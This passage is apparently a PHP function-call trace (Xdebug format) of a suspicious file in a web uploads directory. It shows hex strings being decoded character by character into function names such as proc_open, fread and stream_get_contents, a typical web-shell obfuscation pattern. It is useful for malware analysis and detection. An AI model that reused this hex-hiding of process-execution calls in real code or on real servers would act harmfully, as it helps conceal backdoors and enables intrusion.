2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1518	0	0.057220	722664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1518	1	0.057231	722712
3	1518	R			117
3	1519	0	0.057247	722632	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1519	1	0.057258	722672
3	1519	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1520	0	0.057289	722672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1520	1	0.057300	722720
3	1520	R			114
3	1521	0	0.057312	722640	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1521	1	0.057323	722680
3	1521	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1522	0	0.057353	722672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1522	1	0.057365	722720
3	1522	R			99
3	1523	0	0.057378	722640	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1523	1	0.057389	722680
3	1523	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1524	0	0.057419	722672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1524	1	0.057430	722720
3	1524	R			101
3	1525	0	0.057443	722640	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1525	1	0.057454	722680
3	1525	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1503	1	0.057483	722640
2	1503	R			'is_resource'
1		A						/var/www/html/uploads/lCT.php	7	$func[77] = 'is_resource'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1526	0	0.057517	722640	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66656f66'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1527	0	0.057558	722672	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1527	1	0.057570	722720
3	1527	R			102
3	1528	0	0.057582	722640	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1528	1	0.057594	722680
3	1528	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1529	0	0.057625	722704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1529	1	0.057636	722752
3	1529	R			101
3	1530	0	0.057649	722672	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1530	1	0.057659	722712
3	1530	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1531	0	0.057689	722704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1531	1	0.057701	722752
3	1531	R			111
3	1532	0	0.057713	722672	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1532	1	0.057725	722712
3	1532	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1533	0	0.057755	722704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1533	1	0.057766	722752
3	1533	R			102
3	1534	0	0.057778	722672	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1534	1	0.057789	722712
3	1534	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1526	1	0.057820	722672
2	1526	R			'feof'
1		A						/var/www/html/uploads/lCT.php	7	$func[78] = 'feof'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1535	0	0.057853	722672	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6672656164'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1536	0	0.057893	722704	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1536	1	0.057904	722752
3	1536	R			102
3	1537	0	0.057917	722672	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1537	1	0.057928	722712
3	1537	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1538	0	0.057959	722736	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1538	1	0.057975	722784
3	1538	R			114
3	1539	0	0.057988	722704	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1539	1	0.057999	722744
3	1539	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1540	0	0.058030	722736	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1540	1	0.058041	722784
3	1540	R			101
3	1541	0	0.058053	722704	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1541	1	0.058064	722744
3	1541	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1542	0	0.058094	722736	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1542	1	0.058106	722784
3	1542	R			97
3	1543	0	0.058119	722704	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1543	1	0.058130	722744
3	1543	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1544	0	0.058159	722736	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1544	1	0.058170	722784
3	1544	R			100
3	1545	0	0.058183	722704	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1545	1	0.058193	722744
3	1545	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1535	1	0.058223	722704
2	1535	R			'fread'
1		A						/var/www/html/uploads/lCT.php	7	$func[79] = 'fread'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1546	0	0.058257	722704	dehex	1		/var/www/html/uploads/lCT.php	7	1	'70636c6f7365'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1547	0	0.058298	722736	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1547	1	0.058309	722784
3	1547	R			112
3	1548	0	0.058321	722704	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1548	1	0.058332	722744
3	1548	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1549	0	0.058363	722768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1549	1	0.058374	722816
3	1549	R			99
3	1550	0	0.058390	722736	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1550	1	0.058402	722776
3	1550	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1551	0	0.058432	722768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1551	1	0.058444	722816
3	1551	R			108
3	1552	0	0.058457	722736	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1552	1	0.058468	722776
3	1552	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1553	0	0.058498	722768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1553	1	0.058511	722816
3	1553	R			111
3	1554	0	0.058523	722736	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1554	1	0.058534	722776
3	1554	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1555	0	0.058564	722768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1555	1	0.058576	722816
3	1555	R			115
3	1556	0	0.058589	722736	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1556	1	0.058600	722776
3	1556	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1557	0	0.058630	722768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1557	1	0.058642	722816
3	1557	R			101
3	1558	0	0.058654	722736	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1558	1	0.058665	722776
3	1558	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1546	1	0.058699	722736
2	1546	R			'pclose'
1		A						/var/www/html/uploads/lCT.php	7	$func[80] = 'pclose'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1559	0	0.058733	722736	dehex	1		/var/www/html/uploads/lCT.php	7	1	'70726f635f6f70656e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1560	0	0.058773	722768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1560	1	0.058785	722816
3	1560	R			112
3	1561	0	0.058797	722736	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1561	1	0.058809	722776
3	1561	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1562	0	0.058839	722800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1562	1	0.058851	722848
3	1562	R			114
3	1563	0	0.058863	722768	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1563	1	0.058874	722808
3	1563	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1564	0	0.058905	722800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1564	1	0.058916	722848
3	1564	R			111
3	1565	0	0.058929	722768	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1565	1	0.058940	722808
3	1565	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1566	0	0.058971	722800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1566	1	0.058982	722848
3	1566	R			99
3	1567	0	0.058995	722768	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1567	1	0.059006	722808
3	1567	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1568	0	0.059036	722800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1568	1	0.059047	722848
3	1568	R			95
3	1569	0	0.059060	722768	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1569	1	0.059071	722808
3	1569	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1570	0	0.059101	722800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1570	1	0.059113	722848
3	1570	R			111
3	1571	0	0.059125	722768	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1571	1	0.059137	722808
3	1571	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1572	0	0.059167	722800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1572	1	0.059178	722848
3	1572	R			112
3	1573	0	0.059191	722768	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1573	1	0.059202	722808
3	1573	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1574	0	0.059232	722800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1574	1	0.059243	722848
3	1574	R			101
3	1575	0	0.059256	722768	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1575	1	0.059267	722808
3	1575	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1576	0	0.059297	722808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1576	1	0.059308	722856
3	1576	R			110
3	1577	0	0.059320	722776	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1577	1	0.059332	722816
3	1577	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1559	1	0.059362	722776
2	1559	R			'proc_open'
1		A						/var/www/html/uploads/lCT.php	7	$func[81] = 'proc_open'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1578	0	0.059404	722776	dehex	1		/var/www/html/uploads/lCT.php	7	1	'73747265616d5f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 37
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1579	0	0.059452	722808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1579	1	0.059463	722856
3	1579	R			115
3	1580	0	0.059476	722776	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1580	1	0.059488	722816
3	1580	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1581	0	0.059519	722840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1581	1	0.059530	722888
3	1581	R			116
3	1582	0	0.059543	722808	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1582	1	0.059554	722848
3	1582	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1583	0	0.059585	722840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1583	1	0.059596	722888
3	1583	R			114
3	1584	0	0.059609	722808	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1584	1	0.059620	722848
3	1584	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1585	0	0.059651	722840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1585	1	0.059662	722888
3	1585	R			101
3	1586	0	0.059674	722808	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1586	1	0.059686	722848
3	1586	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1587	0	0.059717	722840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1587	1	0.059728	722888
3	1587	R			97
3	1588	0	0.059740	722808	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1588	1	0.059751	722848
3	1588	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1589	0	0.059781	722840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1589	1	0.059792	722888
3	1589	R			109
3	1590	0	0.059804	722808	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1590	1	0.059816	722848
3	1590	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1591	0	0.059846	722840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1591	1	0.059857	722888
3	1591	R			95
3	1592	0	0.059869	722808	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1592	1	0.059880	722848
3	1592	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1593	0	0.059911	722840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1593	1	0.059922	722888
3	1593	R			103
3	1594	0	0.059934	722808	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1594	1	0.059946	722848
3	1594	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1595	0	0.059976	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1595	1	0.059987	722896
3	1595	R			101
3	1596	0	0.059999	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1596	1	0.060010	722856
3	1596	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1597	0	0.060040	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1597	1	0.060051	722896
3	1597	R			116
3	1598	0	0.060063	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1598	1	0.060075	722856
3	1598	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1599	0	0.060105	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1599	1	0.060116	722896
3	1599	R			95
3	1600	0	0.060128	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1600	1	0.060142	722856
3	1600	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1601	0	0.060173	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1601	1	0.060184	722896
3	1601	R			99
3	1602	0	0.060197	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1602	1	0.060208	722856
3	1602	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1603	0	0.060239	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1603	1	0.060250	722896
3	1603	R			111
3	1604	0	0.060263	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1604	1	0.060275	722856
3	1604	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1605	0	0.060305	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1605	1	0.060316	722896
3	1605	R			110
3	1606	0	0.060328	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1606	1	0.060340	722856
3	1606	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1607	0	0.060370	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1607	1	0.060382	722896
3	1607	R			116
3	1608	0	0.060394	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1608	1	0.060405	722856
3	1608	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1609	0	0.060435	722848	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1609	1	0.060447	722896
3	1609	R			101
3	1610	0	0.060460	722816	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1610	1	0.060470	722856
3	1610	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1611	0	0.060500	722856	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1611	1	0.060512	722904
3	1611	R			110
3	1612	0	0.060525	722824	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1612	1	0.060536	722864
3	1612	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1613	0	0.060566	722856	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1613	1	0.060578	722904
3	1613	R			116
3	1614	0	0.060590	722824	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1614	1	0.060602	722864
3	1614	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1615	0	0.060632	722856	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1615	1	0.060644	722904
3	1615	R			115
3	1616	0	0.060656	722824	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1616	1	0.060667	722864
3	1616	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1578	1	0.060697	722824
2	1578	R			'stream_get_contents'
1		A						/var/www/html/uploads/lCT.php	7	$func[82] = 'stream_get_contents'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1617	0	0.060733	722824	dehex	1		/var/www/html/uploads/lCT.php	7	1	'636c6173735f657869737473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 23
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1618	0	0.060774	722856	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1618	1	0.060785	722904
3	1618	R			99
3	1619	0	0.060798	722824	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1619	1	0.060809	722864
3	1619	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1620	0	0.060840	722888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1620	1	0.060851	722936
3	1620	R			108
3	1621	0	0.060867	722856	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1621	1	0.060879	722896
3	1621	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1622	0	0.060909	722888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1622	1	0.060921	722936
3	1622	R			97
3	1623	0	0.060933	722856	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1623	1	0.060944	722896
3	1623	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1624	0	0.060974	722888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1624	1	0.060985	722936
3	1624	R			115
3	1625	0	0.060998	722856	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1625	1	0.061009	722896
3	1625	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1626	0	0.061039	722888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1626	1	0.061050	722936
3	1626	R			115
3	1627	0	0.061062	722856	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1627	1	0.061073	722896
3	1627	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1628	0	0.061102	722888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1628	1	0.061117	722936
3	1628	R			95
3	1629	0	0.061141	722856	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1629	1	0.061155	722896
3	1629	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1630	0	0.061185	722888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1630	1	0.061197	722936
3	1630	R			101
3	1631	0	0.061209	722856	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1631	1	0.061220	722896
3	1631	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1632	0	0.061250	722888	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	1632	1	0.061262	722936
3	1632	R			120
3	1633	0	0.061274	722856	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	1633	1	0.061285	722896
3	1633	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1634	0	0.061316	722896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1634	1	0.061327	722944
3	1634	R			105
3	1635	0	0.061339	722864	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1635	1	0.061351	722904
3	1635	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1636	0	0.061381	722896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1636	1	0.061392	722944
3	1636	R			115
3	1637	0	0.061404	722864	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1637	1	0.061415	722904
3	1637	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1638	0	0.061445	722896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1638	1	0.061456	722944
3	1638	R			116
3	1639	0	0.061468	722864	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1639	1	0.061479	722904
3	1639	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1640	0	0.061509	722896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1640	1	0.061520	722944
3	1640	R			115
3	1641	0	0.061533	722864	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1641	1	0.061544	722904
3	1641	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1617	1	0.061574	722864
2	1617	R			'class_exists'
1		A						/var/www/html/uploads/lCT.php	7	$func[83] = 'class_exists'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1642	0	0.061611	722864	dehex	1		/var/www/html/uploads/lCT.php	7	1	'737072696e7466'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1643	0	0.061652	722896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1643	1	0.061663	722944
3	1643	R			115
3	1644	0	0.061675	722864	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1644	1	0.061687	722904
3	1644	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1645	0	0.061717	722928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1645	1	0.061728	722976
3	1645	R			112
3	1646	0	0.061740	722896	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1646	1	0.061751	722936
3	1646	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1647	0	0.061782	722928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1647	1	0.061793	722976
3	1647	R			114
3	1648	0	0.061805	722896	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1648	1	0.061817	722936
3	1648	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1649	0	0.061846	722928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1649	1	0.061857	722976
3	1649	R			105
3	1650	0	0.061870	722896	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1650	1	0.061881	722936
3	1650	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1651	0	0.061911	722928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1651	1	0.061923	722976
3	1651	R			110
3	1652	0	0.061936	722896	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1652	1	0.061947	722936
3	1652	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1653	0	0.061977	722928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1653	1	0.061988	722976
3	1653	R			116
3	1654	0	0.062000	722896	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1654	1	0.062012	722936
3	1654	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1655	0	0.062042	722928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1655	1	0.062053	722976
3	1655	R			102
3	1656	0	0.062065	722896	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1656	1	0.062077	722936
3	1656	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1642	1	0.062106	722896
2	1642	R			'sprintf'
1		A						/var/www/html/uploads/lCT.php	7	$func[84] = 'sprintf'
